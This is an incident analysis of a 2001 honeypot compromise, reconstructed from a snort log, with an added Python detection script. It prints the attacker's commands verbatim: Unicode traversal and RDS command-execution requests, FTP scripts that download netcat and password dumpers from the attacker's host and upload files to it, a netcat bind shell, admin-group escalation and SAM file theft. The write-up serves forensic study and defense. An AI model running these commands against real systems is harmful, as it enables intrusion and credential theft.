Jon McKnight
jmcknight@kpmg.com
The Challenge:
On 4 Feb. 2001, the system 213.116.251.162 successfully attacked and compromised the honeypot 172.16.1.106, otherwise known as lab.wiretrip.net. We have reason to believe that the attacker knew this was a honeypot, however we decided to release this challenge as it exemplifies the most common of NT attacks found in the wild. Your only source of information is the snort binary log file that captured the entire attack. You can download this in (.gz format, MD5=af1588ce7f7798190694addef3f148f7), or (.zip format, MD5=aca62e19ba49546d2bfd1fa1c71b5751). You will have to extract and analyze the information from this binary log file. Remember, entries will not only be judged on your answers, but how easy they are to read, and if you show how you obtained/conducted your analysis.
1.Which exploit(s) were used to attack the system?
Unicode and RDS
2. How were the exploits used to access and control the system?
First he verified that it was vulnerable to Unicode, then to RDS. He tried to use RDS to create an ftp script file containing the username, password and the files (pdump.exe, samdump.exe, and nc.exe) that he wanted to download from a remote server. Everything worked correctly except that he had the wrong password for the ftp server. He could not see this, so he assumed something else was wrong.
He attempts an ftp connection to his own machine, and this works. Next he tries to create and execute the ftp script file via Unicode, and it works. Now he uses Unicode to issue a command to the lab.wiretrip.net box to copy cmd.exe and rename it cmd1.exe. Then he uses Unicode to bind cmd.exe to port 6969 with netcat. I am somewhat puzzled why he did this through Unicode, as netcat will then only be running as IUSR_machine. It would have been much less time consuming to use RDS to issue the netcat command.
3. What was done once access was gained?
Johna used RDS to issue the pdump command, with the output piped to a file. This did not work, however. At this time Johna also had an IUSR_machine-level connection to lab.wiretrip.net via netcat. He issued a net users command via RDS, piped the output to a file and then viewed the contents via his Unicode netcat connection. He then adds a README.NOW.Hax0r file in an effort to alert the admin to patch the server.
Next Johna attempts to add the IUSR_Kenny account and the IWAM_Kenny account to the admin group. This will give Johna's Unicode netcat connection administrative rights and allow him to view things like the sam._ file.
Now that his netcat connection is admin level he issues the net start command to see what services are running. Johna now attempts to add a user called testuser with the password UgotHacked. He is unsuccessful so he decides to update the sam._ file (using rdisk). He first tried this command from the netcat connection but that did not seem to work so he tries RDS. After a few tries it seems to work. Once the file is updated he then copies it to the C:\ dir into a file called har.txt. He loses his connection and reconnects. After verifying that the file has been successfully copied he then copies har.txt to wwwroot and views har.txt from his web browser. It is safe to assume that he copies the file into L0phtCrack and starts cracking the administrator password.
Twelve minutes later the jig is up: Johna figures out it is a honeypot. My guess is that the administrator's password has been cracked and that gives him his clue. I would add to that clue the fact that one of RFP's boxes is vulnerable to two exploits for which he has received much press (creating the msadc2.pl script and researching Unicode).
He changes IWAM_Kenny’s password to Snake69Snake69. He deletes har.txt from the wwwroot directory and apparently tells his friends on IRC to check out a box that he has hacked. This would flood the snort log (which it has done) and make it harder to sift through the data. I think he has mentioned that it is both Unicode and RDS vulnerable because a different box connects. This Linux box creates a file called test.txt using RDS. The contents of the file are “this can’t be true”.
I notice a bunch of different connections looking at the test.txt. This provides more evidence to the fact that he is communicating with friends over IRC. The Linux box seems to have told everyone else.
Johna creates a new ftp file, this time he wants to have lab.wiretrip.net send him whisker.tar.gz. While Johna was getting whisker, another nc connection was made to lab.wiretrip.net. It is possible this is Johna reconnecting, but at this point we cannot verify with the data that we have since we know other people are aware of the vulnerabilities.
Johna’s last action before the snort log ends is to delete the ftp file that he placed on the server earlier.
4. How could this attack have been prevented?
Applying the patches for Unicode and RDS
MS00-057 ("File permission canonicalization") for Unicode
http://www.microsoft.com/security/bulletins/MS99-025faq.asp for RDS
5. How much time did you spend on this analysis and writeup?
14 hours
Bonus Question:
Do you feel that the attacker in question knew if this was a honeypot? If so, why or why not?
Yes
At approximately 13:23 GMT Johna issues the following command:
echo best honeypot i've seen till now :) > rfp.txt
It seems he has figured out this was a honeypot. One of the most obvious reasons to me would be that lab.wiretrip.net is vulnerable to an exploit (RDS) that its owner (RFP) developed. RFP also researched the Unicode exploit. I don't think it became apparent to Johna until around the time he issued the honeypot quote. I say this because he makes some other files like
Johna realized this was a honeypot after he had copied the current password file. It is possible that he cracked the password for the users on lab.wiretrip.net and one of the cracked passwords may have tipped him off.
Looks like they first tried Unicode to view the boot.ini file. It seems they used a script to automatically check for this vulnerability. There are so many out in the wild I have no idea which exact script.
GET /guest/default.asp/..%C0%AF../..%C0%AF../..%C0%AF../boot.ini HTTP/1.1
GET /guest/default.asp/..À¯../.../..%C0%AF../..%C0%AF../boot.ini HTTP/1.1
GET /guest/default.asp/..À¯../..À¯../..%AF../..%C0%AF../boot.ini HTTP/1.1
GET /guest/default.asp/..À¯../..À¯../..À¯../boot.ini HTTP/1.1
It seems the box is vulnerable. Success at 12:24:18
HTTP/1.1 200 OK
Server: Microsoft-IIS/4.0
Date: Sun, 04 Feb 2001 12:24:18 GMT
Content-Type: text/html
Cache-control: private
Transfer-Encoding: chunked
[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)\WINNT
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)\WINNT="Windows NT Server, Enterprise Edition Version 4.00"
multi(0)disk(0)rdisk(0)partition(1)\WINNT="Windows NT Server, Enterprise Edition Version 4.00 [VGA mode]" /basevideo /sos
GET /msadc/ HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/msword, application/vnd.ms-powerpoint, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0; Hotbar 2.0)
Host: lab.wiretrip.net
Connection: Keep-Alive
Cookie: ASPSESSIONIDGQQGGQZK=KPGNFIPAKMIDBOCJNGOAAHBD
HTTP/1.1 403 Access Forbidden
Server: Microsoft-IIS/4.0
Date: Sun, 04 Feb 2001 12:25:31 GMT
Connection: close
Content-Type: text/html
Content-Length: 172
A professor once told me that written code is like a fingerprint. Looking at the snort log and then at the code in msadc2.pl, I know that the snort log is showing me msadc2.pl being run.
Snort Log:
ADCClientVersion:01.06
Content-Type: multipart/mixed;
boundary=!ADM!ROX!YOUR!WORLD!; num-args=3
--!ADM!ROX!YOUR!WORLD!
Content-Type: application/x-varg
Content-Length: 366
msadc2.pl snippet:
ADCClientVersion:01.06
Content-Type: multipart/mixed;
boundary=!ADM!ROX!YOUR!WORLD!; num-args=3
--!ADM!ROX!YOUR!WORLD!
Content-Type: application/x-varg
Content-Length: $reqlen
First the intruder tests to see if the exploit works. He creates a file called fun in the C:\ directory containing the word "werd". (The RDS query is sent as a two-byte Unicode string, which is why these command strings appear in the packet dump with each letter separated.)
cmd /c echo werd >> c:\fun
Date: Sun, 04 Feb 2001 12:26:03 GMT
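The two checks this writeup performs by eye, recognising the overlong-UTF-8 traversal in the boot.ini request lines above and recovering the RDS command strings from the wide-character dump that msadc2.pl produces, as an added Python example; it is not code from the original submission or from the challenge. The sample request lines and RDS body are constructed to mirror the quoted evidence (the marker strings and the first command come from the writeup), and the overlong byte values for '/' and '\' are the published IIS ones.

```python
import re
from urllib.parse import unquote_to_bytes

# IIS "Unicode" bug: overlong UTF-8 forms of '/' (C0 AF) and '\' (C1 9C) passed
# the server's path check but were decoded to real separators afterwards.
OVERLONG = {b"\xc0\xaf": b"/", b"\xc1\x9c": b"\\"}

# msadc2.pl fingerprint the writeup matches on: the ADC client version line and
# the fixed multipart boundary the script hard-codes.
MSADC_MARKERS = (b"ADCClientVersion:01.06", b"!ADM!ROX!YOUR!WORLD!")

# Eight or more printable ASCII bytes each followed by NUL: a UTF-16LE string.
WIDE_RUN = re.compile(rb"(?:[\x20-\x7e]\x00){8,}")


def decode_path(path: bytes) -> bytes:
    """Percent-decode, then map the overlong separators to what IIS used."""
    raw = unquote_to_bytes(path)
    for bad, good in OVERLONG.items():
        raw = raw.replace(bad, good)
    return raw


def is_unicode_traversal(request_line: bytes) -> bool:
    """True if the request hid '../' or '..\\' behind an overlong encoding.
    Works on raw bytes, so it covers both the percent-encoded form (..%C0%AF..)
    and the raw-byte form that the capture renders as two Latin-1 characters."""
    parts = request_line.split()
    if len(parts) < 2:
        return False
    if not any(bad in unquote_to_bytes(parts[1]) for bad in OVERLONG):
        return False  # a plain '../' would have been caught by IIS itself
    decoded = decode_path(parts[1])
    return b"../" in decoded or b"..\\" in decoded


def is_msadc_probe(payload: bytes) -> bool:
    """True when an HTTP body carries both msadc2.pl markers."""
    return all(marker in payload for marker in MSADC_MARKERS)


def wide_strings(payload: bytes) -> list:
    """Printable UTF-16LE runs in a payload. The RDS query is sent this way,
    which is why the snort dump shows the command as 'c m d / c ...'."""
    return [m.group().decode("utf-16-le") for m in WIDE_RUN.finditer(payload)]


def rds_commands(payload: bytes) -> list:
    """Shell commands carried inside the wide strings of an RDS request."""
    found = []
    for text in wide_strings(payload):
        m = re.search(r"cmd /c .+", text)
        if m:
            found.append(m.group().strip())
    return found


def triage(requests, body) -> dict:
    """Summarise what the checks find, as the writeup does by hand."""
    return {
        "unicode_traversals": [r for r in requests if is_unicode_traversal(r)],
        "msadc_probe": is_msadc_probe(body),
        "rds_commands": rds_commands(body),
    }


# Constructed samples that mirror the evidence quoted in the writeup; they are
# not packets taken from the challenge capture.
SAMPLE_REQUESTS = [
    b"GET /guest/default.asp/..%C0%AF../..%C0%AF../..%C0%AF../boot.ini HTTP/1.1",
    b"GET /guest/default.asp/..\xc0\xaf../..\xc0\xaf../..\xc0\xaf../boot.ini HTTP/1.1",
    b"GET /msadc/ HTTP/1.1",
    b"GET /har.txt HTTP/1.1",
]
SAMPLE_RDS_BODY = (
    b"ADCClientVersion:01.06\r\n"
    b"Content-Type: multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=3\r\n"
    b"\r\n--!ADM!ROX!YOUR!WORLD!\r\nContent-Type: application/x-varg\r\n\r\n"
    + b"\x02\x00\x03\x00"                                  # binary filler
    + "cmd /c echo werd >> c:\\fun".encode("utf-16-le")  # first RDS command
    + b"\x00\x00\x07\x00"
)
```

Running triage over HTTP bodies carved from the capture gives the same three findings the writeup reaches by reading the dump: which requests used the traversal, whether the msadc2.pl fingerprint is present, and the commands that were pushed through RDS.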
Now the intruder checks to see if the file has been created, using the Unicode vulnerability. Looking at this signature again verifies that the intruder is using a Unicode script (well, it doesn't verify it 100%, but I have great certainty).
GET /guest/default.asp/..%C0%AF../..%C0%AF../..%C0%AF../fun HTTP/1.1
GET /guest/default.asp/..À¯../.../..%C0%AF../..%C0%AF../fun HTTP/1.1
GET /guest/default.asp/..À¯../..À¯../..%AF../..%C0%AF../fun HTTP/1.1
GET /guest/default.asp/..À¯../..À¯../..À¯../fun HTTP/1.1
It seems the file is there because "werd" is printed out below. This means the server is vulnerable to RDS.
HTTP/1.1 200 OK
Server: Microsoft-IIS/4.0
Date: Sun, 04 Feb 2001 12:26:11 GMT
Content-Type: text/html
Cache-control: private
Transfer-Encoding: chunked
werd
cmd /c echo user johna2k > ftpcom
Date: Sun, 04 Feb 2001 12:31:47 GMT
cmd /c echo hacker2000 >> ftpcom
Date: Sun, 04 Feb 2001 12:31:54 GMT
cmd /c echo get samdump.dll >> ftpcom
Date: Sun, 04 Feb 2001 12:32:01 GMT
cmd /c echo get pdump.exe >> ftpcom
Date: Sun, 04 Feb 2001 12:32:08 GMT
cmd /c echo get nc.exe >> ftpcom
Date: Sun, 04 Feb 2001 12:32:15 GMT
cmd /c echo quit >> ftpcom
Date: Sun, 04 Feb 2001 12:32:22 GMT
Now the intruder wants to tell the server to ftp to another box that has the files the intruder needs. In this case the server the intruder wants to ftp to is www.nether.net.
cmd /c ftp -s:ftpcom -n www.nether.net
Date: Sun, 04 Feb 2001 12:32:29 GMT
Doh! The intruder had a bad login.
220 freenet.nether.net FTP server (SunOS 5.7) ready.
USER johna2k
331 Password required for johna2k.
PASS hacker2000
530 Login incorrect.
PORT 172,16,1,106,12,64
530 Please login with USER and PASS.
RETR samdump.dll
530 Please login with USER and PASS.
RETR pdump.exe
530 Please login with USER and PASS.
RETR nc.exe
530 Please login with USER and PASS.
QUIT
221 Goodbye.
Not realizing that the FTP failed the intruder issues a command to run pdump and save the results in a file called new.pass.
After creating this file the intruder wants the server to ftp this file to the intruder's server at www.nether.net
cmd /c pdump.exe >> new.pass
Date: Sun, 04 Feb 2001 12:32:46 GMT
cmd /c echo user johna2k > ftpcom2
Date: Sun, 04 Feb 2001 12:32:56 GMT
cmd /c echo hacker2000 >> ftpcom2
Date: Sun, 04 Feb 2001 12:33:03 GMT
cmd /c put new.pass >> ftpcom2
Date: Sun, 04 Feb 2001 12:33:10 GMT
cmd /c echo quit >> ftpcom2
Date: Sun, 04 Feb 2001 12:33:17 GMT
cmd /c ftp -s:ftpcom2 -n www.nether.net
Date: Sun, 04 Feb 2001 12:33:24 GMT
Doh! Doh! Bad login again, but the intruder still does not know.
220 freenet.nether.net FTP server (SunOS 5.7) ready.
USER johna2k
331 Password required for johna2k.
PASS hacker2000
530 Login incorrect.
QUIT
221 Goodbye.
cmd /c ftp 213.116.251.162
Date: Sun, 04 Feb 2001 12:33:43 GMT
The intruder (Johna) connects to his server:
--------H-A-C-K T-H-E P-L-A-N-E-T--------
220-W3|_c0m3 T0 JohnA's 0d4y Ef-Tee-Pee S3rv3r.
220-Featuring 100% elite hax0r warez!@$#@
220-Im running win 95 (Release candidate 1), on a p33, with 16mb Ram.
220 -------H-A-C-K T-H-E P-L-A-N-E-T--------
GET /msadc/..%C0%AF../..%C0%AF../..%C0%AF../program%20files/common%20files/system/msadc/cmd1.exe?/c+echo+open+213.116.251.162+>ftpcom HTTP/1.1
Looks like this way works.
220--------H-A-C-K T-H-E P-L-A-N-E-T--------
220-W3|_c0m3 T0 JohnA's 0d4y Ef-Tee-Pee S3rv3r.
220-Featuring 100% elite hax0r warez!@$#@
220-Im running win 95 (Release candidate 1), on a p33, with 16mb Ram.
220 -------H-A-C-K T-H-E P-L-A-N-E-T--------
USER johna2k
331 User name okay, need password.
PASS haxedj00
230 User logged in, proceed.
PORT 172,16,1,106,12,71
200 PORT Command successful.
RETR nc.exe
150 Opening ASCII mode data connection for nc.exe (59392 bytes).
Issues a command to copy cmd.exe to cmd1.exe using Unicode.
/msadc/..À¯../.../..%C0%AF../..%C0%AF../winnt/system32/cmd.exe?/c+copy+C:\winnt\system32\cmd.exe+cmd1.exe HTTP/1.1
Now he tells netcat to bind cmd.exe to port 6969
GET /msadc/..%C0%AF../..%C0%AF../..%C0%AF../program%20files/common%20files/system/msadc/cmd1.exe?/c+nc+-l+-p+6969+-e+cmd1.exe
Success. NOTE: he is connected as IUSR not Administrator
Microsoft(R) Windows NT(TM)
(C) Copyright 1985-1996 Microsoft Corp.
C:\Program Files\Common Files\system\msadc>
Now he looks to see if his files are there:
02/04/01 06:41a <DIR> .
02/04/01 06:41a <DIR> ..
09/25/97 07:41a 596 adcjavas.inc
09/25/97 07:41a 589 adcvbs.inc
04/30/97 11:00p 208,144 cmd1.exe
02/04/01 06:41a 98 ftpcom
09/25/97 08:28a 172,816 msadce.dll
09/25/97 08:16a 5,632 msadcer.dll
09/25/97 08:24a 23,312 msadcf.dll
09/25/97 08:24a 91,408 msadco.dll
09/25/97 08:19a 5,120 msadcor.dll
09/26/97 08:19a 42,256 msadcs.dll
02/04/01 06:41a 59,392 nc.exe
02/04/01 06:41a 32,768 pdump.exe
10/02/97 07:28a 19,388 readme.txt
02/04/01 06:41a 36,864 samdump.dll
16 File(s) 698,383 bytes
1,690,861,056 bytes free
C:\Program Files\Common Files\system\msadc>
pdump and samdump are there. So is cmd1.exe (which he copied earlier) and ftpcom.
Johna is excited so now he executes pdump using RDS and saves the output to a file called "yay.txt"
cmd /c C:\Program Files\Common Files\system\msadc\pdump.exe >> yay.txt
Date: Sun, 04 Feb 2001 12:42:48 GMT
He deletes ftpcom and realizes that he needs to put the full path of pdump
cmd /c C:\Program Files\Common Files\system\msadc\pdump.exe >> c:\yay.txt
Date: Sun, 04 Feb 2001 12:43:32 GMT
That didn't work so he looks around the c:\ directory of lab.wiretrip.net.
He issues a net users command via RDS and pipes the output to heh.txt.
cmd /c net users >> c:\heh.txt
Date: Sun, 04 Feb 2001 12:48:55 GMT
Using his Unicode netcat connection he checks to see if the file is there.
dir
Volume in drive C has no label.
Volume Serial Number is 8403-6A0E
Directory of C:\
11/26/00 12:34p 0 AUTOEXEC.BAT
11/26/00 06:57p 322 boot.ini
12/26/00 07:36p <DIR> exploits
02/04/01 06:48a 263 heh.txt
12/07/00 03:30p <DIR> InetPub
12/07/00 03:12p <DIR> Multimedia Files
12/26/00 07:10p <DIR> New Folder
01/26/01 02:10p 78,643,200 pagefile.sys
12/21/00 08:59p <DIR> Program Files
12/21/00 08:59p <DIR> TEMP
02/04/01 06:48a <DIR> WINNT
12/26/00 07:09p <DIR> wiretrip
02/04/01 06:43a 0 yay.txt
14 File(s) 78,643,785 bytes
1,690,861,056 bytes free
Now he issues the type command via his Unicode netcat connection to see the contents of heh.txt
User accounts for \\
-------------------------------------------------------------------------------
Administrator
Guest
IUSR_KENNY
IWAM_KENNY
The command completed with one or more errors.
He is kind enough to leave a file for the admin called README.NOW.Hax0r
echo Hi, i know that this a is a lab server, but patch the holes! :-) >>README.NOW.Hax0r
He tries to add IWAM_KENNY to localgroup as a domain admin
cmd /c net localgroup Domain Admins IUSR_KENNY /ADD
Date: Sun, 04 Feb 2001 12:52:58 GMT
After a couple of unsuccessful tries he is able to add IUSR_KENNY and IWAM_KENNY as domain admins.
cmd /c net localgroup administrators IUSR_KENNY /ADD
Date: Sun, 04 Feb 2001 12:55:00 GMT
cmd /c net localgroup administrators IWAM_KENNY /ADD
Date: Sun, 04 Feb 2001 12:55:12 GMT
Issuing the 'net localgroup administrators' command, he is able to see that IUSR_KENNY and IWAM_KENNY are now both admins.
Alias name administrators
Comment Members can fully administer the computer/domain
Members
-------------------------------------------------------------------------------
Administrator Domain Admins IUSR_KENNY IWAM_KENNY
The command completed successfully.
net start
These Windows NT services are started:
Alerter
Computer Browser
EventLog
FTP Publishing Service
IIS Admin Service
License Logging Service
Messenger
MSDTC
Net Logon
NT LM Security Support Provider
Plug and Play
Protected Storage
Remote Procedure Call (RPC) Locator
Remote Procedure Call (RPC) Service
Server
Spooler
TCP/IP NetBIOS Helper
Workstation
World Wide Web Publishing Service
The command completed successfully.
Now he tries to add a user named testuser with the password UgotHacked.
cmd /c net user testuser UgotHacked /ADD
Date: Sun, 04 Feb 2001 12:57:58 GMT
Next he tries to add testuser to the Administrators local group.
cmd /c net localgroup Administrators testuser /ADD
Date: Sun, 04 Feb 2001 12:58:13 GMT
But these commands did not work and he spends some time trying to find out why. He gives up.
He goes to the winnt repair directory and issues the rdisk command to update the sam._ file.
cmd /c rdisk -/s
Date: Sun, 04 Feb 2001 13:05:27 GMT
cmd /c rdisk -s
Date: Sun, 04 Feb 2001 13:05:33 GMT
cmd /c rdisk
Date: Sun, 04 Feb 2001 13:05:38 GMT
Using netcat he checks to see if the sam._ file has been updated. The file's date has not changed, which means the file has not been updated.
dir
Volume in drive C has no label.
Volume Serial Number is 8403-6A0E
Directory of C:\WINNT\repair
02/04/01 07:05a <DIR> .
02/04/01 07:05a <DIR> ..
02/04:}Sä
10/13/96 07:38p 438 autoexec.nt
11/26/00 12:34p 2,510 config.nt
11/26/00 06:43p 15,677 default._
11/26/00 06:43p 14,946 ntuser.da_
11/26/00 06:43p 4,593 sam._
11/26/00 06:43p 6,066 security._
11/26/00 06:54p 50,405 setup.log
11/26/00 06:43p 124,776 software._
11 File(s) 1,046,803 bytes
1,690,111,488 bytes free
He reissues the rdisk commands
cmd /c rdisk
Date: Sun, 04 Feb 2001 13:06:00 GMT
cmd /c rdisk -s /
Date: Sun, 04 Feb 2001 13:06:06 GMT
cmd /c rdisk /s -
Date: Sun, 04 Feb 2001 13:06:28 GMT
He checks to see if this worked. Sam._ has not been updated but ntuser.da_ has been updated. At least something is working.
dir
Volume in drive C has no label.
Volume Serial Number is 8403-6A0E
Directory of C:\WINNT\repair
02/04/01 07:06a <DIR> .
02/04/01 07:06a <DIR> ..
10/13/96 07:38p 438 autoexec.nt
11/26/00 12:34p 2,510 config.nt
11/26/00 06:43p 15,677 default._
02/04/01 07:06a 14,946 ntuser.da_
11/26/00 06:43p 4,593 sam._
11/26/00 06:43p 6,066 security._
11/26/00 06:54p 50,405 setup.log
02/04/01 07:05a 177,732 system._
11 File(s) 3,741,679 bytes
1,687,127,552 bytes free
Try, try, try again
cmd /c rdisk /s -
Date: Sun, 04 Feb 2001 13:06:46 GMT
Success! My guess is that this was the first time rdisk was run on this machine and it took a while to update. I think one of his original commands worked, but he wasn't patient.
dir
Volume in drive C has no label.
Volume Serial Number is 8403-6A0E
Directory of C:\WINNT\repair
02/04/01 07:06a <DIR> .
02/04/01 07:06a <DIR> ..
10/13/96 07:38p 438 autoexec.nt
11/26/00 12:34p 2,510 config.nt
11/26/00 06:43p 15,677 default._
02/04/01 07:06a 14,946 ntuser.da_
11/26/00 06:43p 4,593 sam._
11/26/00 06:43p 6,066 security._
11/26/00 06:54p 50,405 setup.log
02/04/01 07:05a 177,732 system._
11 File(s) 3,741,679 bytes
1,686,932,480 bytes free
After he does this he uses type to copy the contents of the sam._ file into a file called har.txt.
cmd /c type c:\winnt\repair\sam._ >> c:\har.txt
Date: Sun, 04 Feb 2001 13:07:32 GMT
He verifies the file is there:
dir
Volume in drive C has no label.
Volume Serial Number is 8403-6A0E
Directory of C:\
11/26/00 12:34p 0 AUTOEXEC.BAT
11/26/00 06:57p 322 boot.ini
11/26/00 12:34p 0 CONFIG.SYS
12/26/00 07:36p <DIR> exploits
02/04/01 07:07a 5,327 har.txt
12/07/00 03:30p <DIR> InetPub
12/07/00 03:12p <DIR> Multimedia Files
12/26/00 07:10p <DIR> New Folder
01/26/01 02:10p 78,643,200 pagefile.sys
12/21/00 08:59p <DIR> Program Files
02/04/01 06:49a 69 README.NOW.Hax0r
12/21/00 08:59p <DIR> TEMP
02/04/01 07:05a <DIR> WINNT
12/26/00 07:09p <DIR> wiretrip
02/04/01 06:43a 0 yay.txt
15 File(s) 78,648,918 bytes
1,689,455,616 bytes free
He then copied har.txt to wwwroot.
C:\InetPub\wwwroot>copy c:\har.txt
1 file(s) copied.
Next he views har.txt from his web browser (I assume he copies it to his machine and runs L0phtCrack).
GET /har.txt HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/msword, application/vnd.ms-powerpoint, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0; Hotbar 2.0)
Host: lab.wiretrip.net
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: Microsoft-IIS/4.0
Date: Sun, 04 Feb 2001 13:11:28 GMT
Content-Type: text/plain
Accept-Ranges: bytes
Last-Modified: Sun, 04 Feb 2001 13:07:33 GMT
ETag: "5063fd6fab8ec01:b85"
Content-Length: 5327
At approximately 13:23 GMT Johna issues the following command:
echo best honeypot i've seen till now :) > rfp.txt
It seems he has figured out this was a honeypot. One of the most obvious reasons to me would be that lab.wiretrip.net is vulnerable to an exploit (RDS) that its owner (RFP) developed. RFP also researched the Unicode exploit.
After looking around for a while, Johna changes IWAM_KENNY's password to Snake69Snake69
cmd /c net user IWAM_KENNY Snake69Snake69
Date: Sun, 04 Feb 2001 13:33:07 GMT
echo this can't be true > test.txt
Then this person issues the type command to verify the data is in the file.
I don't think this is Johna because this person is running Linux 2.4.1. I know that this is the person who created the test.txt file because they request it from their web browser.
GET /test.txt HTTP/1.0
If-Modified-Since: Sun, 04 Feb 2001 13:33:15 GMT; length=7
Connection: Keep-Alive
User-Agent: Mozilla/4.76 [en] (X11; U; Linux 2.4.1 i686)
Pragma: no-cache
Host: lab.wiretrip.net
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*
Accept-Encoding: gzip
Accept-Language: en
Accept-Charset: iso-8859-1,*,utf-8
HTTP/1.1 200 OK
Server: Microsoft-IIS/4.0
Date: Sun, 04 Feb 2001 13:34:58 GMT
Content-Type: text/plain
Accept-Ranges: bytes
Last-Modified: Sun, 04 Feb 2001 13:34:22 GMT
ETag: "f0eff02eaf8ec01:b85"
Content-Length: 21
Johna's web browser looks like this:
GET /win2k.gif HTTP/1.1
Accept: */*
Referer: http://lab.wiretrip.net/
Accept-Language: en-us
Accept-Encoding: gzip, deflate
If-Modified-Since: Sat, 16 Dec 2000 00:36:10 GMT
If-None-Match: "0796d2ff866c01:b85"
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0; Hotbar 2.0)
Host: lab.wiretrip.net
Connection: Keep-Alive
Cookie: ASPSESSIONIDGQQGGQZK=LPGNFIPAECCHCHMAFOIKAOEB
GET /test.txt HTTP/1.1
Host: lab.wiretrip.net
Connection: keep-alive
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Accept-Language: en-gb
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)
Via: 1.1 cache-haw (NetCache NetApp/5.0D13)
X-Forwarded-For: 194.117.146.52
HTTP/1.1 200 OK
Server: Microsoft-IIS/4.0
Date: Sun, 04 Feb 2001 13:37:06 GMT
Content-Type: text/plain
Accept-Ranges: bytes
Last-Modified: Sun, 04 Feb 2001 13:34:22 GMT
ETag: "f0eff02eaf8ec01:b85"
Content-Length: 21
this can't be true
Now here is another request from another box
GET /test.txt HTTP/1.0
User-Agent: Mozilla/4.7 [en] (Win98; I)
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*
Accept-Encoding: gzip
Accept-Language: en
Accept-Charset: iso-8859-1,*,utf-8
Via: 1.0 cache3.estpak.ee:8080 (Squid/2.3.STABLE3)
X-Forwarded-For: 213.168.4.30
Host: lab.wiretrip.net
Cache-Control: max-age=259200
Connection: keep-alive
HTTP/1.1 200 OK
Server: Microsoft-IIS/4.0
Connection: keep-alive
Date: Sun, 04 Feb 2001 13:37:15 GMT
Content-Type: text/plain
Accept-Ranges: bytes
Last-Modified: Sun, 04 Feb 2001 13:34:22 GMT
ETag: "f0eff02eaf8ec01:b85"
Content-Length: 21
this can't be true
Another request
GET /test.txt HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/msword, */*
Accept-Language: nl
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 4.01; Windows 95)
Host: lab.wiretrip.net
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: Microsoft-IIS/4.0
Date: Sun, 04 Feb 2001 13:38:07 GMT
Content-Type: text/plain
Accept-Ranges: bytes
Last-Modified: Sun, 04 Feb 2001 13:34:22 GMT
ETag: "f0eff02eaf8ec01:b85"
Content-Length: 21
this can't be true
Another request
GET /test.txt HTTP/1.0
Connection: Keep-Alive
User-Agent: Mozilla/4.61 [en] (X11; I; Linux 2.2.16 i686)
Host: lab.wiretrip.net
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*
Accept-Encoding: gzip
Accept-Language: en
Accept-Charset: iso-8859-1,*,utf-8
HTTP/1.1 200 OK
Server: Microsoft-IIS/4.0
Connection: keep-alive
Date: Sun, 04 Feb 2001 13:38:51 GMT
Content-Type: text/plain
Accept-Ranges: bytes
Last-Modified: Sun, 04 Feb 2001 13:34:22 GMT
ETag: "f0eff02eaf8ec01:b85"
Content-Length: 21
this can't be true
Another request
GET /test.txt HTTP/1.0
Host: lab.wiretrip.net
Accept: text/html, text/plain, text/sgml, */*;q=0.01
Accept-Encoding: gzip, compress
Accept-Language: en
User-Agent: Lynx/2.8.3rel.1 libwww-FM/2.14
HTTP/1.1 200 OK
Server: Microsoft-IIS/4.0
Date: Sun, 04 Feb 2001 13:41:54 GMT
Content-Type: text/plain
Accept-Ranges: bytes
Last-Modified: Sun, 04 Feb 2001 13:34:22 GMT
ETag: "f0eff02eaf8ec01:b85"
Content-Length: 21
Another request, this time with the language set to French
GET /test.txt HTTP/1.1
Accept: */*
Accept-Language: fr
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)
Host: lab.wiretrip.net
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: Microsoft-IIS/4.0
Date: Sun, 04 Feb 2001 13:43:39 GMT
Content-Type: text/plain
Accept-Ranges: bytes
Last-Modified: Sun, 04 Feb 2001 13:34:22 GMT
ETag: "f0eff02eaf8ec01:b85"
Content-Length: 21
this can't be true
There is no way Johna has this many boxes. The request times are very close together which makes me believe this is a coordinated effort. I would bet that he has informed his friends on IRC.
GET /msadc/..À¯../..À¯../..%AF../..%C0%AF../program%20files/common%20files/system/msadc/cmd1.exe?/c+echo+put+c:\wiretrip\whisker.tar.gz+>>ftpcom HTTP/1.1
Now he tells lab.wiretrip.net to ftp the file to his server:
220--------H-A-C-K T-H-E P-L-A-N-E-T--------
220-W3|_c0m3 T0 JohnA's 0d4y Ef-Tee-Pee S3rv3r.
220-Featuring 100% elite hax0r warez!@$#@
220-Im running win 95 (Release candidate 1), on a p33, with 16mb Ram.
220 -------H-A-C-K T-H-E P-L-A-N-E-T--------
USER johna2k
331 User name okay, need password.
PASS haxedj00
230 User logged in, proceed.
PORT 172,16,1,106,12,87
200 PORT Command successful.
STOR whisker.tar.gz
150 Opening ASCII mode data connection for whisker.tar.gz.
226 Transfer complete.
QUIT
221 Buh bye, you secksi hax0r j00 :]
GET /msadc/..%C0%AF../..%C0%AF../..%C0%AF../program%20files/common%20files/system/msadc/cmd1.exe?/c+nc+-l+-p+6969+-e+cmd1.exe HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0; Hotbar 2.0)
Host: lab.wiretrip.net
